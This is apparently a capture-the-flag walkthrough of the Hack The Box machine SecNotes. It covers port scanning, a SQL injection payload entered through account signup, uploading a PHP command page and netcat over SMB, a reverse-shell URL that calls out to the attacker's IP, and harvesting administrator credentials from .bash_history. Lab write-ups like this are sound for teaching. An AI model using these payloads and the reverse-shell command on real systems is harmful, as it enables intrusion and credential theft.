HTB - SecNotes Walkthrough

HTB - Secnotes

Nmap

nmap -sS -sV -p- -oN portscan 10.10.10.97

We Discover that this machine has 2 ports running IIS and SMB open.

 

Port 80

Navigate to the page on port 80, and you will find a login page.

I did try some default login's such as admin:admin, but like most CTF's they normally are not that easy.

There is a great finding on the login page that lets you know if you have a valid username.

However before I proceeded down that path of guessing valid login's, I decided to try "sign up now" and make a login. This was successful and I was able to log in now with our newly made credentials.

We instantly find a valid username. First thing I tried to do was log out and attempt to log in the user name tyler. The login page confirms that username is valid. Now we just need a password.

I tried performing SQLI attacks from the login screen, no luck. XSS can also be performed when creating a new note.

Note: Even though this will not work for this machine, I strongly recommend automating a SQLI attack on the username with burp. It may help you with future machines you wish to try a SQLI attack on a username.

Solution

You can perform an SQLI attack when creating a user.

When creating a user, add ' OR +1=1 -- - after the user name. Put any password you like and try log in with your new credentials.

Note:' OR +1=1 -- - is normally successful with most SQLI's in CTF's, at least for ones I have a completed.

We found tyler's password and a smb share path from this. 

If you have not already done so, now would be a good time to add secnotes.htb to your /etc/hosts.

SMB

With Tyler's credential's we can now enumerate and exploit SMB.

To Confirm that, secnotes.htb/new-site is a valid SMB share, run: smbclient --list//secnotes.htb -U tyler.

 

Run smbclient //secnotes.htb/new-site -U tyler to login in.

From previous CTF's it was obvious that we would have upload something to generate a shell. If we remember from our nmap scan, we found 2 ports running IIS. What we upload to this SMB share will be loaded onto the IIS web server port 8808.

 

Reverse Shell

To obtain a reverse shell, we need to upload a php page that will allow execution of cmd.exe commands. We will also need to upload 64bit netcat executable.

You can execute cmd.exe commands with your php code in multiple ways. However, I quite liked doing it this way because it is a quite different from the usual way I have normally uploaded a shell.

After you have uploaded your files and you have your netcat listener ready, enter in the url:

http://secnotes.htb:8808/cmd.php?cmd=nc64+-e+powershell.exe+<ip>+<port>

You can now go an get the user flag.

Privilege Escalation

After you obtain the user flag, you will see a file called bash.lnk and you would of also seen folders called Distros and Ubuntu. 

Thanks to a video about installing kali on window's by Network Chuck, I was aware of installing Linux subsystem's on Windows.

To start using bash, enter:

bash

python -c 'import pty; pty.spawn("/bin/sh")'

 

Unfortunately being root on a Linux subsystem did not escalate our privileges to get the root flag.

Navigate the root directory and cat .bash_history.

 

We find the Administrator credentials, we can now log in through SMB and go and obtain the root flag.